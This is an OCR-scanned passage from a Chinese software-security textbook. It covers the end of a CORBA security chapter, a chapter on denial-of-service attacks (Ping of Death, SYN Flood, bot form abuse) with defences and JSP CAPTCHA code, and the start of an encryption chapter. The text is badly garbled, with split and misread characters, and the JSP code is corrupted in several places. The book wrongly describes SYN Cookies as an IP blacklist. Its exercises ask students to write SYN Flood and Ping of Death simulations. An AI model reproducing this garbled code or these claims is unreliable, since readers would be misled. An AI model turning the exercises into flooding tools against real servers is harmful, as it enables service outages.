说 来 ,系统 的 保护 ,首先 是 基于 安全 策略 的 。 

但 是 ,分 布 式 系统 中 运行 的 对 象 可 能 有 很 多 个 ,对 每 个 对 象 实行 安全 策略 ,比较 
麻烦 。 于 是 ,在 CORBA 中 定义 了 安全 域 的 概念 ,安全 域 主要 用 于 对 系统 进行 划分 。 
对 象 安全 域 是 基于 安全 策略 ,对 一 组 对 象 进行 管理 的 一 种 方式 。 可 以 认为 ,安全 域 
是 安全 管理 的 基本 单位 ,安全 域 中 的 对 象 具 有 类 似 的 安全 需求 ,基于 这 些 安全 需求 ， 
来 利用 相应 的 安全 策略 保护 安全 域 中 的 对 象 。CORBA 体系 中 ,安全 域 还 可 以 划分 
为 多 个 子安 全 域 ,关于 子安 全 域 和 父 安全 域 的 安全 策略 的 重生 问题 ,读者 可 以 参考 
相关 文献 。 

CORBA 安全 体系 结构 ,具有 良好 的 特性 ,能 够 满足 大 部 分 应 用 系统 的 需求 ; 不 
过 ,也 具备 一 些 缺陷 ,如 : 


。 其 安全 规范 建立 在 CORBA 基础 之 上 ,无 法 与 其 他 组 件 环 境 , 如 EJB、DCOM | 


统一 ; 
。 对 身份 的 指定 不 够 明确 ,等 等 。 


小 结 


本 章 主要 针对 目前 比较 流行 的 远程 调用 方法 和 常见 的 组 件 进行 安全 讲解 。 首 先 讲 ， 
解 远程 调用 的 基本 原理 和 安全 问题 ,然后 对 ActiveX 和 Java Applet 也 进行 了 安全 方面 | 


的 讲解 , 接 下 来 对 DCOM 和 EJB 安全 方面 进行 了 讲解 ,最 后 对 CORBA 安全 进行 了 
讲解 。 
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练 “ 习 


. 编写 一 个 EJB 方法 控制 的 代码 。 

. 编写 一 个 不 安全 的 ActiveX ,并 测试 。 

. 编写 一 个 DCOM 方法 控制 的 代码 。 

。 怎样 让 Java Applet 可 以 访问 本 地 文件 ? 
.编写 一 个 CORBA 程序 ,体验 其 安全 服务 。 


wD 
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第 ,/ / 齐 
避免 拒绝 服务 攻击 


拒绝 服务 (Denial of Service,DoS) 攻 击 , 是 网 络 上 常见 的 一 类 攻击 的 总 称 , 其 目的 
是 使 计算 机 或 网 络 无 法 提供 正常 的 服务 。 在 DoS 攻击 中 ,最 常见 是 网 络 带宽 攻击 和 连 
通 性 攻击 。 前 者 一 般 恶 意向 网 络 发 送 极 大 的 通信 量 , 使 得 可 用 网 络 资源 被 消耗 ,而 合法 
的 用 户 连 接 反 而 无 法 通过 ; 后 者 主要 是 针对 网 络 上 的 计算 机 ,向 这 些 计 算 机 发 出 大 量 
的 连接 请 求 ,消耗 计算 机 可 用 的 操作 系统 资源 ,导致 计算 机 无 法 再 处 理 合法 用 户 的 
请 求 。 

DoS 攻击 由 于 实施 起 来 比较 容易 ,效果 也 比较 明显 ,因此 在 网 络 上 比较 常见 ,也 给 
网 络 安全 带 来 巨大 的 威胁 。 

本 章 首先 讲解 了 拒绝 服务 攻击 的 过 程 以 及 危害 , 接 下 来 闪 述 了 几 种 常见 的 拒绝 服 
务 攻击 ,最 后 对 它们 提出 了 解决 方案 。 本 章 涉及 到 的 DoS 攻击 包括 系统 崩溃 、 资 源 不 
足 、 恶 意 访问 等 。 


11.1 拒绝 服务 攻击 


拒绝 服务 攻击 作为 互联 网 上 的 一 种 常见 攻击 手段 ,已 经 有 多 年 历史 。 拒 绝 服务 攻 
击 曾 被 称 为 互联 网 上 最 为 严重 的 威胁 之 一 。 早 期 的 拒绝 服务 攻击 是 利用 了 TCP/IP 协 
议 的 缺陷 ,将 提供 服务 的 网 络 的 资源 消耗 列 尽 ,导致 其 不 能 提供 正常 服务 ,不 过 ,在 本 章 
中 ,也 将 一 些 对 服务 器 的 恶意 访问 包含 了 进来 。 由 于 拒绝 服务 攻击 形式 较 多 ,并 且 很 多 
情况 下 都 是 利用 了 一 些 现 有 协议 的 漏洞 ,因此 ,到 目前 为 止 .还 没有 很 好 的 解决 办 法 来 
解决 拒绝 服务 攻击 问题 。 

拒绝 服务 攻击 的 攻击 方式 有 多 种 ,如 : 

。 消耗 网 络 带 宽 ; 

。 消耗 网 络 设备 的 CPU; 

。 消耗 网 络 设备 的 内 存 ; 

。 导致 网 络 上 设备 系统 崩溃 ,等 等 。 
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注意 ,这 里 的 网 络 设备 也 包括 网 络 上 的 计算 机 。 


提示 “以 具有 代表 性 的 攻击 手段 SYN flood ICMP flood、UDP flood 为 例 ,其 原 
理 是 : 针对 同一 个 服务 器 的 某 个 端口 (如 HTTP 所 在 的 80 端口 ) , 短 时 间 内 发 送 大 量 
伪造 的 连接 请 求 报 文 ,造成 服务 器 忙 不 过 来 ,严重 的 时 候 资源 耗 尽 、 系 统 停止 响应 其 至 
崩溃 。 这 是 对 网 络 上 服务 器 的 攻击 。 

而 另 一 种 是 针对 网 络 带宽 本 身 的 攻击 ,使 用 真实 的 IP 地 址 ,对 服务 器 发 起 大 量 的 
真实 连接 ,抢占 带宽 ,由 于 服务 器 的 承载 能 力 有 限 ,就 有 可 能 造成 合法 用 户 无 法 连接 , 当 
然 也 有 可 能 造成 服务 器 的 资源 耗 尽 ,系统 崩溃 。 更 有 甚 者 ,可 以 使 用 假 的 IP 地 址 (IP 
地 址 欺骗 ) ,使 得 服务 器 端 无 法 通过 * 黑 名 单 ” 来 拒绝 一 些 恶 意 的 IP 地址。 


从 攻击 原理 分 ,拒绝 服务 攻击 可 分 为 两 类 : 

(1) 基于 漏洞 的 攻击 ,又 称 为 逻辑 攻击 (Logic Attack)。 该 攻击 方法 中 ,攻击 者 首 
先 找到 软件 中 存在 的 漏洞 (如 操作 系统 中 存在 的 缓冲 区 溢出 漏洞 ) ,然后 向 存在 漏洞 的 
系统 发 送 经 过 精心 设计 的 数据 包 , 使 得 系统 崩溃 或 性 能 急剧 下 降 。 

(2) 基于 流量 的 攻击 ,又 称 为 洪水 攻击 (Flooding Attack/Bandwidth attack)。 该 


攻击 方式 是 指 攻 击 者 在 短 时 间 内 ,向 目标 系统 发 送 大 量 数据 包 ,消耗 目标 网 络 带宽 或 系 
， 统 资源 。 


传统 的 拒绝 服务 攻击 ,一 般 是 从 一 个 攻击 源 攻 击 一 个 目标 。 随 着 攻击 技术 的 进步 ， 
近 些 年 来 ,拒绝 服务 攻击 已 经 演变 为 分 布 .协作 、 大 规模 攻击 方式 ,从 多 个 攻击 源 攻击 一 
个 目标 , 即 分 布 式 拒绝 服务 攻击 (Distributed Deny of Service,DDoS)。DDoS 通常 被 用 
于 对 一 些 大 型 商务 网 站 或 网 络 系统 进行 攻击 ,攻击 强度 和 造成 的 危害 大 大 超过 传统 的 


Dos 攻击 。 


有 关 DoS 攻击 和 DDoS 攻击 的 其 他 资料 ,读者 可 以 参考 相关 文献 。 
11.2 几 个 拒绝 服务 攻击 的 案例 


11.2.1 程序 崩溃 攻击 
拒绝 服务 攻击 引起 程序 崩溃 ,可 以 通过 改善 代码 质量 来 降低 损失 。 在 这 类 攻击 中 ， 


最 薄弱 的 环节 是 一 些 使 用 了 网 络 堆栈 进行 工作 的 场合 。 比 如 ,在 UDP 通信 中 ,构建 一 
个 UDP 数据 包 , 在 UDP 文件 头 中 指定 的 长 度 比 实际 上 数据 包 长 度 大 , 则 系统 内 核 会 


引起 内 存 访问 错误 ,此 时 各 种 系统 都 会 有 相应 的 反应 ,如 : 
。 UNIX 系统 中 ,系统 进入 应 急 状 态 ; 
。 Windows 系统 会 蓝屏 或 者 进行 错误 检查 ; 
。 系统 重新 启动 ,等 等 。 
本 节 以 Ping Of Death 攻击 来 阐述 这 个 问题 。 
根据 TCP/IP 的 规范 ,一 个 包 的 长 度 最 大 为 65 535 字 节 。 尽 管 一 个 包 的 长 度 不 能 


本 身 存在 着 漏洞 ,如 果 攻 击 者 精心 设计 ,最 终 会 导致 被 攻击 目标 缓冲 区 溢出 ,这 也 是 拒 
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绝 服务 攻击 的 一 种 形式 。 
一 般 说 来 , 当 一 个 主机 收 到 了 长 度 大 于 65 535 字 节 的 包 时 ,就 是 受到 了 Ping of 
Death 攻击 ,该 攻击 会 造成 系统 的 宕 机 。 如 下 代码 是 一 个 IP 头 定义 : 


IP 头 定义 

// 定义 I 首部 

struct _iphdr 

{ 
unsigned char h_verlen; // 4 位 首部 长 度 ,4 位 IP 版 本 号 
unsigned char tos; // 8 位 服务 类 型 TOS 
unsigned short total_len; // 16 位 总 长 度 ( 字 节 ) 
unsigned short ident; // 16 位 标识 
unsigned short frag_and flags; // 3 位 标志 位 ,13 位 偏 移 量 
unsigned char ttl; // 8 位 生存 时 间 TTL 
unsigned char proto; // 8 位 协议 (TCP，UDP 或 其 他 ) 
unsigned short checksum; // 16 位 IP 首部 校 验 和 
unsigned int sourceIP; // 32 位 源 IP 地 址 
unsigned int destIP; // 32 位 目的 划 地 址 


}; 


在 以 上 结构 体 ip_header 中 ,total_len 定义 了 数据 包 中 所 包含 的 字 节 数目 ,在 本 程 
序 中 unsigned short 最 大 值 是 65 535, 即 一 个 包 的 长 度 最 大 为 65 535 字 节 。 

此 时 如 何 实现 Ping Of Death 攻击 呢 ? 这 里 首先 要 将 在 结构 体 ip_header 的 结构 
进行 一 下 解释 。 在 结构 体 ip_header 中 ,有 一 个 成 员 frag_and_flags, 该 成 员 共 2 字 节 
16 位 , 它 分 为 两 部 分 。 

(1) 3 位 标志 位 : 这 里 需要 解释 的 是 其 中 两 位 ,其 中 1 位 指定 数据 包 是否 允 许 被 分 
段 ,还 有 1 位 指定 后 面 是 否 还 有 更 多 允许 分 段 的 数据 包 。 

(2) 另外 13 位 : 指定 数据 包 分 段 的 偏 移 量 。 

这 样 就 可 能 出 现 一 个 问题 : 在 整个 数据 包 所 包含 的 最 后 一 个 字 节 处 ,最 后 一 个 数 
据 段 可 以 被 添加 到 整个 数据 包 中 ,数据 包 的 长 度 就 会 超过 最 大 值 是 65 535。 此 时 出 现 
拒绝 服务 攻击 。 

怎样 避免 这 样 的 问题 ? 很 明显 ,应 该 在 编程 的 过 程 中 进行 充足 的 考虑 (比如 在 数据 
组 装 时 进行 充分 的 检查 ) ,并 且 认 真 进行 测试 ,使 得 数据 包 的 长 度 在 65 535 之 内 。 以 下 
代码 结构 可 以 解决 以 上 问题 : 


// 数据 检查 
bool ReassemblePackets( 含 有 多 个 _iphdr 的 集合 ) 
{ 
// Step1: 获 取 最 后 一 个 包 , 找到 其 偏 移 量 
// Step2: 获 得 该 包 的 长 度 
// Step3: 用 偏 移 量 加 上 该 包 长 度 ,看 是 否 大 于 65535 
// Step4 :决定 该 包 是 否 被 丢弃 
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该 代码 结构 中 描述 了 运算 过 程 ,具体 的 代码 和 具体 的 语言 相关 ,用 户 可 以 参考 相关 
资料 ,完成 相应 代码 。 


11.2.2 资源 不 足 攻击 


资源 不 足 攻击 ,顾名思义 ,是 指 攻 击 者 能 够 消耗 特定 的 资源 ,使 得 系统 资源 不 足 。 
以 聊天 程序 为 例 , 如 果 服 务 器 代码 中 ,每 收 到 一 个 Socket 连接 请 求 就 开辟 一 个 新 的 线 


， 程 ,那么 敌 方 就 有 可 能 反复 请 求 连接 ,如 果 不 限制 工作 线程 的 数目 ,攻击 者 就 很 容易 反 


复 进 行 连接 请 求 ,制造 足够 多 的 线程 来 耗 尽 服务 器 端的 CPU 和 内 存 资源 。 本 节 以 


SYN Flood 为 例 , 来 说 明 这 种 攻击 的 原理 和 解决 方法 。 


SYN Flood 是 当前 比较 流行 的 DoS 与 DDoS 方式 之 一 ,很 多 其 他 形式 的 攻击 都 可 
能 是 这 种 攻击 的 变种 ,或 者 原理 与 此 方法 类 似 。 在 该 攻击 方法 中 ,利用 了 TCP 协议 缺 
陷 , 向 服务 器 端 发 送 大 量 的 TCP 连接 请 求 , 而 这 些 连 接 请 求 是 伪造 的 ,从 而 使 得 被 攻击 


。 方 资源 耗 尽 (CPU 满 负荷 或 内 存 不 足 )。 


根据 网 络 通信 原理 ,TCP 协议 是 基于 连接 的 , 言 下 之 意 ,为 了 在 服务 端 和 客户 端 之 
间 传 送 TCP 数据 ,必须 先 建立 一 个 TCP 连接 ,然后 才能 够 传输 数据 ,否则 一 端 就 进行 
等 待 。 其 中 ,建立 TCP 连接 的 过 程 在 TCP 协议 中 被 称 为 三 次 握手 (Three-way 
Handshake) ,其 过 程 如 图 11-1 所 示 品 。 


Send SYN 
(seq=x) Te Receive SYN 
(seq=x) 
Send SYN 
Receive SYN p= 0 (seq=y,ACK=x+1) 
(seq=y,ACK=x+1) 
Send ACK 
ee) De Receive ACK 
(ack=y+1l) 


图 11-1 


图 11-1 中 ,HOST A 向 HOST B 发 出 链接 请 求 ,可 以 认为 HOST A 为 客户 端 ， 
HOST B 为 服务 器 端 ,其 流程 如 下 : 

(1) 客户 端 向 服务 器 端 发 送 一 个 TCP 报 文 (同步 报 文 或 称 SYN 报 文 ) ,该 报 文 包 
含 SYN( 同 步 ) 标 志 ,SYN 报 文中 同时 指明 了 客户 端 使 用 的 端口 以 及 TCP 连接 的 初始 


| 序号 (seq 一 x); 


(2) 服务 器 端 在 收 到 客户 端的 SYN 报 文 后 ,将 返回 一 个 SYN( 同 步 ) 十 ACK( 确 


认 ) 标 志 的 报 文 给 客户 端 ,表示 客户 端的 请 求 被 服务 器 端 接受 ; 从 图 11-1 中 可 以 看 出 ， 
| 此 处 seq 二 y,ACK 二 x 十 1; 


(3) 客户 端 收 到 服务 器 端的 SYN( 同 步 ) 十 ACK( 确 认 ) 标 志 的 报 文 之 后 ,也 返回 一 


， 个 含有 ACK 标志 (ack 二 y 十 1) 的 报 文 给 服务 器 端 ,到 此 一 个 TCP 连接 完成 。 
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不 过 ,我 们 无 法 保证 网 络 的 稳定 性 ,如 果 由 于 网 络 原因 ,无 法 保证 三 次 握手 能 够 正 
常 完 成 ,TCP 协议 是 怎么 解决 的 呢 ? 
以 一 个 极端 的 例子 为 例 , 在 上 面 例子 的 第 一 步 中 ,客户 端 向 服务 器 发 送 了 SYN 报 
文 后 突然 停电 ,服务 器 并 不 知道 客户 端 停电 了 ,在 服务 器 上 仍然 执行 第 二 步 工作 ,也 就 
是 说 ,服务 器 端 在 收 到 客户 端的 SYN 报 文 后 ,将 返回 一 个 SYN( 同 步 ) 十 ACK( 确 认 ) 标 
志 的 报 文 给 客户 端 。 | 
但 是 此 时 ,由 于 客户 端 停电 了 ,客户 端 就 无 法 执行 第 三 步 ,也 就 是 说 服务 器 端 无 法 
收 到 客户 端的 ACK 报 文 (第 三 次 握手 无 法 完成 ) ,怎么 处 理 ? | 
TCP 协议 中 ,这 种 情况 下 服务 器 端 一 般 再 次 发 送 SYN 十 ACK 给 客户 端 ,经 过 一 段 
时 间 , 如 果 还 是 没有 响应 , 则 将 该 连接 视 为 无 效 的 连接 ,并 且 丢 弃 ; 通俗 地 说 ,就 是 服务 
器 等 待 ,超过 一 定时 间 ,放弃 连接 。 
一 般 说 来 ,服务 器 等 待 的 这 个 时 间 为 30 秒 到 2 分 钟 ,该 时 间 也 称 为 SYN Timeout 
时 间 。 | 
攻击 者 就 是 利用 这 个 缺陷 ,可 以 对 服务 器 进行 攻击 。 因 为 当 单个 客户 端 连接 服务 
器 时 出 现 异常 ,导致 服务 器 的 一 个 线程 等 待 一 段 时 间 , 不 会 造成 服务 器 的 崩溃 ; 但 是 ， 
如 果 大 量 的 客户 端 连接 服务 器 出 现 异常 ,导致 服务 器 的 多 个 线程 都 要 等 待 一 段 时 间 , 服 
务 器 就 难以 承受 了 。 
SYN Flood 攻击 中 ,攻击 者 就 是 大 量 模 拟 了 这 种 情况 ,此 时 ,服务 器 在 短 时 间 内 必 
须 消耗 资源 来 维护 一 个 很 大 的 未 完成 的 连接 的 集合 ,并 且 还 要 对 这 个 集合 不 断 进行 遍 
历 和 检查 ,会 消耗 非常 多 的 CPU 时 间 和 内 存 ; 此 外 ,服务 器 还 要 不 断 对 各 个 客户 端 发 
出 SYN 十 ACK 报 文 进行 重 试 , 当 攻 击 足 够 办 猛 时 ,服务 器 的 TCP/IP 栈 如 果 不 够 强大 
就 会 造成 崩溃 ; 即使 没有 崩溃 ,服务 器 也 会 忙于 处 理 这 些 伪造 的 请 求 , 当 客户 的 正常 请 
求 到 达 时 , 它 也 难以 处 理 。 站 在 正常 客户 的 角度 来 看 ,服务 器 响应 变 慢 , 或 者 干脆 失去 
了 响应 。 
从 开发 角度 讲 , 要 防御 此 种 攻击 ,有 几 种 简单 的 解决 方法 : 
。 缩 短 SYN Timeout 时 间 。SYN Flood 攻击 的 本 质 在 于 向 服务 器 端 请 求 大 量 的 
未 完成 连接 ,而 这 些 连接 的 个 数 直接 影响 到 攻击 的 效果 。 因 此 ,如 果 将 SYN ， 
Timeout 时 间 缩短 ,就 有 可 能 让 某 些 连接 在 短 时 间 之 内 被 放弃 ,可 以 降低 服务 
器 负担 。 
值得 注意 的 是 ,如 果 将 SYN Timeout 设置 过 小 ,又 有 可 能 会 影响 正常 客户 的 访问 。 
但 是 ,该 方法 仅 在 对 方 攻击 频 度 不 高 的 情况 下 生效 。 
。 设置 黑 名 单 。 一 般 采 用 Cookie 方法 ,也 称 SYN Cookie。 该 方法 中 , 当 有 一 个 
请 求 到 达 时 ,给 该 请 求 连接 的 IP 地 址 分 配 一 个 Cookie, 如果 在 短 时 间 之 内 ,该 
IP 地 址 重复 发 送 SYN 报 文 ,就 可 以 认为 该 IP 地 址 是 一 个 攻击 者 ,将 其 加 入 到 
黑 名 单 ,凡是 被 加 入 到 黑 名 单 中 的 IP 地 址 ,传送 的 数据 包 直接 被 丢弃 。 该 方法 
主要 针对 客户 端 IP 地 址 没有 经 过 伪造 的 情况 。 | 
如 果 客户 端 攻 击 者 的 IP 地 址 经 过 伪造 ,这 种 方法 就 不 奏效 了 。 
。 使 用 相应 软件 (防火 墙 ) ,屏蔽 掉 一 些 可 疑 的 客户 端 , 也 能 从 一 定 程度 上 降低 被 ， 
攻击 系统 的 负荷。 | 
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怎样 判断 程序 受到 了 拒绝 服务 攻击 呢 ? 以 TCP SYN Flood 攻击 为 例 , 一 般 情况 
下 ,可 以 一 些 简 单 步骤 来 判断 系统 是 否 正 在 遭受 TCP SYN Flood 攻击 ,如 : 
。 由 正常 客户 端 报告 ,发 现 服务 端 无 法 提供 正常 的 TCP 服务 ,连接 请 求 经 常 被 拒 
绝 或 超时 。 
。 在 服务 器 端 ,利用 netstat-an 命令 ,检查 系统 中 是 否 有 大 量 的 SYN_RECYV 连接 
状态 ,如果 有 很 多 ,或 者 超过 一 定 比 例 , 就 说 明 系统 可 能 遭受 了 拒绝 服务 攻击 。 
图 11-2 是 运行 该 命令 的 效果 。 
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11.2.3 恶意 访问 攻击 

某 些 应 用 程序 (特别 是 Web 程序 ) 是 针对 不 可 预知 的 客户 的 ,客户 的 访问 大 都 是 于 
常 的 ,但 是 某 些 恶意 的 访问 可 能 会 给 系统 造成 一 定 困扰 。 以 Web 程序 为 例 , Web 程序 
的 运行 结构 如 图 11-3 所 示 


发 太 请 求 


cp sch 


客户 端 | 一 
返回 响应 
发 送 请 求 


-一 一 一 人 | 


访问 数据 


客户 六 | 一 


返回 响应 


图 11-3 中 ,客户 端 可 以 发 出 请 求 ,运行 应 用 服务 器 中 的 程序 (如 网 页 ) ,服务 器 端 程 

序 访问 数据 库 , 得 到 结果 应 答 给 客户 端 。 此 时 ,恶意 的 客户 端 有 可 能 对 服务 器 端 造成 一 
些 攻击 ,如 : 

意 添加 。 编 写 一 段 机 器 人 程序 ,通过 客户 端 页 面 ,向 服务 器 端 反复 提交 一 些 

in 的 信息 ( 如 注册 新 用 户 、 发 表 评 论 等 ), 让 应 用 服务 器 忙 ,数据 库 反复 添 

信息 ,保存 大 量 垃圾 数据 。 


。 恶 意 查 询 。 编 写 一 个 机 器 人 程序 ,对 同一 个 账号 ,反复 进行 登录 试探 密码 ， 
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以 上 Web 站 碰 到 的 客户 机 恶意 攻击 ,是 一 种 身份 欺骗 ,是 一 种 常见 的 攻击 手段 。 
它 通 过 在 客户 端 脚本 写 人 一 些 代码 ,然后 利用 客户 机 在 网 站 反复 登录 ; 或 者 攻击 者 自 
己 创 建 一 个 网 页 ,网 页 中 包含 一 个 表单 ,表单 内 包含 了 和 原始 网 站 提交 表单 中 相同 的 提 
交 目 标 和 表单 元 素 ,然后 反复 提交 表单 ,实际 上 是 在 服务 器 端 进行 相应 的 操作 ,如 创建 
账户 ,提交 垃圾 数据 等 。 | 

如 果 服 务 器 本 身 不 能 验证 该 提交 的 有 效 性 ,并 及 时 拒绝 此 非法 操作 , 它 会 让 服务 器 | 
端 反复 运行 ,不 仅 消耗 系统 的 时 间 资 源 (让 服务 器 做 无 用 功 ) ,也 消耗 系统 的 空间 资源 ， 
(数据 库 中 存储 了 大 量 垃圾 数据 ) ,这 样 , 降 低 网 站 性 能 ,正常 用 户 访问 得 不 到 及 时 响应 ， 
严重 情况 下 甚至 使 程序 崩溃 。 


说 提 示 “该 种 攻击 ,严格 讲 , 并 不 属于 拒绝 服务 攻击 的 范畴 。 但 是 ,由 于 该 攻击 也 
能 消耗 服务 器 端 资源 ,因此 将 其 和 拒绝 服务 攻击 一 起 阐述 ,在 此 说 明 。 


要 想 防范 该 种 恶意 攻击 ,问题 的 关键 在 于 判断 访问 Web 程序 是 合法 用 户 还 是 恶意 
操作 的 用 户 , 这 一 般 采 用 "验证 码 "技术 来 实现 。 

所 谓 验证 码 ,就 是 由 服务 器 产生 一 串 随机 产生 的 数字 或 符号 ,形成 一 幅 图 片 , 图 片 
应 该 传 给 客户 端 ,为 了 防止 客户 端 用 一 些 程序 来 进行 自动 识别 ,图 片 中 通常 要 加 上 一 些 
干扰 像素 ,由 用 户 肉眼 识别 其 中 的 验证 码 信息 。 

客户 输入 表单 提交 时 ,验证 码 也 提交 给 网 站 服务 器 ,只 有 验证 成 功 ,才能 执行 实际 
的 数据 库 操作 。 

典型 的 含有 验证 码 的 表单 如 图 11-4 所 示 。 


用 户 要 想 登录 ,必须 准确 填 人 验证 码 。 Rpg: [一 一 一 
验证 码 为 什么 可 以 防止 对 网 站 的 恶意 访问 呢 ? 首先 介 aasm: 
绍 验证 码 必须 满足 以 下 几 个 性 质 ， mn: [S32 


。 不 同 的 请 求 ,得 到 的 验证 码 应 该 是 随机 的 ,或 者 是 无 
法 预知 的 ,必须 由 服务 器 端 产生 。 

验证 码 必须 通过 人 眼 识别 ,而 通过 图 像 编程 的 方法 编写 的 机 器 人 程序 在 客户 端 
运行 ,几乎 无 法 识别 。 这 就 是 验证 码 都 比较 牌 斜 或 者 模糊 的 原因 ,否则 就 很 容 
易 通过 图 像 处 理 算法 来 识别 。 | 
除了 人 了 眼 观察 之 外 ,客户 端 无 法 通过 其 他 手段 获取 验证 码 信 息 。 这 就 是 验证 码 
为 什么 用 图 片 ,而 不 是 直接 用 一 个 数字 文本 在 页 面 上 显示 的 原因 ,因为 客户 端 
可 能 通过 访问 网 页 源 代码 的 方式 获取 验证 码 的 内 容 。 

最 初 的 验证 码 , 只 是 几 个 随机 生成 的 数字 。 但 是 很 快 就 有 能 识别 数字 的 软件 了 ; 
目前 常见 的 验证 码 是 随机 数字 (有 的 系统 也 用 随机 文字 ) 图 片 验证 码 , 不 过 ,目前 也 正在 
研究 对 验证 码 的 识别 。 

验证 码 的 工作 流程 如 下 : | 

(1) 服务 器 端 随机 生成 验证 码 字符 串 , 保 存在 内 存 中 ,并 写 入 图 片 ,将 图 片 连同 表 ， 
单 发 给 客户 端 。 | 

(2) 客户 端 输 入 验证 码 , 并 提交 该 表单 ,服务 器 端 获取 客户 提交 的 验证 码 , 和 前 面 
产生 的 随机 数字 相 比较 ; 如 果 相 同 , 则 继续 进行 表单 所 描述 的 操作 (如 登录 ,注册 等 ) ; 


图 11-4 


如 果 不 同 ,直接 将 错误 信息 返回 给 客户 端 。 避免 程序 的 继续 运行 以 及 访问 数据 库 。 
很 多 语言 中 都 可 以 实现 验证 码 。 如 PHP、ASP、JSP 都 可 以 较 好 地 实现 这 个 功能 。 
，。 ”系统 生成 一 个 随机 数 ,大 多 为 4 位 数字 和 字母 ,或 者 是 数字 和 字母 的 组 合 ,然后 生成 一 
供 站 | 张 根据 随机 数 来 确定 的 图 片 ,把 随机 数 写 入 session 中 ,传递 到 要 验证 的 页 面 ; 生成 的 
图片 显示 给 客户 端 ,并 要 求 客户 端 输入 该 随机 数 内容 ,提交 到 验证 页 面 ,验证 session 的 
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内 容 和 提交 的 内 容 是 否 一 致 。 


以 JSP 中 登录 为 例 ,以 下 是 随机 图 片 生成 代码 : 


generateCode. jsp 


<% @ page language = "java" 


< 和 


%> 


import = "java. awt. * ,java.awt. image. * ,java. util. * , javax. imageio. * " 


pageEncoding = "gb2312" %> 


response. setHeader( "Cache - Control", "no ~ cache"); 

// 在 内 存 中 创建 图 像 

int width = 60, height = 20; 

BufferedImage image = new BufferedImage(width, height, 
BufferedImage. TYPE_INT_RGB); 

// 获取 图 形 上 下 文 

Graphics g = image. getGraphics(); 

// 设 定 背景 色 

g. setColor(new Color(200, 200, 200)); 

g. fillRect(0, 0, width, height); 

// 取 随机 产生 的 验证 码 (4 位 数字 ) 

Random rnd = new Random(); 

int randNum = rnd.nextInt(8999) + 1000; 

String randStr = String.valueOf(randNum); 

// 将 验证 码 存 人 SESSION 

session. setAttribute("randStr", randStr); 

// 将 验证 码 显示 到 图 像 中 

g. setColor(Color. black); 

g. setFont (new Font("", Font.PLAIN, 20)); 

g. drawString(randStr, 10, 17); 


// 随机 产生 100 个 干扰 点 ,使 图 像 中 的 验证 码 不 易 被 其 他 程序 探测 到 


for (int i = 0; i < 100; i++) 

{ 
int x = rnd.nextInt(width); 
int y = rnd.nextInt(height); 
g.drawOval(x, y, 1, 1); 

} 

// 图 像 生效 

g.dispose(); 

// 输出 图 像 到 页 面 

ImageI0. write( image, "JPEG", response.getOutputStream()); 

out. clear(); 

out = pageContext. pushBody(); 
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以 下 是 表单 生成 代码 : 


loginForm. jsp 


<% @ page language = "java" pageEncoding = "gb2312" %> 
<html> 
<body> 
< form action = "loginResult. jsp"> 
用 户 名 :< input type = "text"”name = "account" /><BR> 
密 码 : < input type = "password" name = "password" /><BR> 
验证 码 :< input type = "text" name = "code" size= "10"> 
< img border = 0 src = "generateCode. jsp"> 
< input type = "submit" value = "登录 "> 
</form> 
</body> 
</html> 


运行 该 网 页 得 到 的 结果 如 图 11-5 所 示 。 


验证 网 页 代码 如 下 : 


loginResult. jsp 


<% @ page language = "java" pageEncoding = "gb2312" %> 
<html> 
<body> 
<% 
String code = request. getParameter("code"); 
System. out. println( session. getAttribute( "randstr")); 
String randStr = (String)session. getAttribute("randStr"); 
if(!code.equals(randStr) ) 


{ 
out. println(" 验 证 码 错 误 !"); 
} 
else 
{ 
out. println(" 验 证 码 正 确 !"); 
// 做 其 他 事情 
} 
第 > 
</body> 
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输入 正确 的 内 容 ,得 到 结果 如 图 11-6 所 示 。 
输入 错误 验证 码 ,得 到 结果 如 图 11-7 所 示 。 


验证 码 正确 ! 验证 码 错 误 ! 
图 11-6 图 11-7 
小 结 


本 章 首先 对 拒绝 服务 攻击 的 过 程 .危害 进行 了 阐述 ,针对 集中 常见 的 拒绝 服务 攻击 


进行 了 分 析 ,并 提出 了 一 定 的 解决 方案 。 本 章 涉及 到 的 攻击 有 系统 崩溃 .资源 不 足 、 恶 


意 访问 等 ,读者 可 以 查询 一 些 其 他 相关 资料 ,来 获取 更 多 的 知识 。 


练 习 


1. 用 VC 编写 模拟 SYN Flood 攻击 的 例子 。 
2. 任 选 一 种 动态 网 页 技术 ,编写 一 个 注册 界面 ,要 求 , 只 有 验证 码 输入 正确 的 人 才 


。 能 够 进行 注册 


3. 用 代码 模拟 Ping Of Death 的 例子 。 
4. 设计 一 个 例子 ,攻击 服务 器 并 让 服务 器 端 执行 多 个 死 循 环 。 
5. 对 上 题 的 情况 提出 解决 方案 。 


参考 文献 


互动 百科 . 三 次 握手 协议 .http://www. hudong. com/wiki/ 三 次 握手 协议 . 


数据 的 加 密 保护 


在 信息 时 代 , 数 据 的 安全 越 来 越 受到 了 关注 。 对 于 保存 在 计算 机 上 的 某 些 数据 , 希 
望 其 信息 不 被 人 所 知 ; 对 于 在 网 络 上 传输 的 重要 数据 ,希望 即使 被 敌 方 窃听 之 后 也 不 
会 泄密 。 此 时 ,将 信息 进行 加 密 , 就 成 了 保障 数据 安全 的 首要 方法 。 

加 密 算法 一 般 可 分 为 对 称 加 密 、 非 对 称 加 密 和 单 向 加 密 3 类 ,由 于 其 特点 不 同 ,在 
不 同 的 系统 中 具有 不 同 的 应 用 范围 ,各 类 算法 中 都 具有 一 些 代表 性 算法 。 如 对 称 加 密 
体系 中 的 DES、3DES、AES 算法 ; 非 对 称 加 密 体 系 中 的 RSA、DSA 算法 ; 单 向 加 密 中 
的 MD5、SHA 算法 等 。 

一 般 而 言 ,加 密 体系 中 ,其 最 核心 的 内 容 是 加 密 算法 和 密 钥 ; 加 密 算 法 通常 公开 ， 
加 密 系统 的 安全 性 决定 于 密 钥 的 隐藏 性 ,因此 , 密 钥 管理 是 加 密 系统 中 的 重要 工作 。 

不 同 的 语言 对 于 加 密 算法 的 实现 原理 基本 相同 ,本 章 以 Java 语言 为 例 , 实 现 了 一 
些 常见 的 加 密 解 密 算 法 。 对 于 其 他 语言 实现 加 密 解 密 , 读 者 可 以 参考 其 他 文献 。 

另外 ,本 章 还 对 密 钥 的 安全 进行 讲解 。 


12.1 加 密 概 述 


12.1.1 加 密 的 应 用 


信息 可 能 被 黑客 用 于 非法 的 操作 以 获取 利益 ; 加 密 吕 是 以 某 种 特殊 的 算法 将 原 有 
的 信息 进行 改变 ,在 这 种 情况 下 ,未 授权 的 用 户 即使 获得 了 已 加 密 的 信息 ,但 是 因为 无 
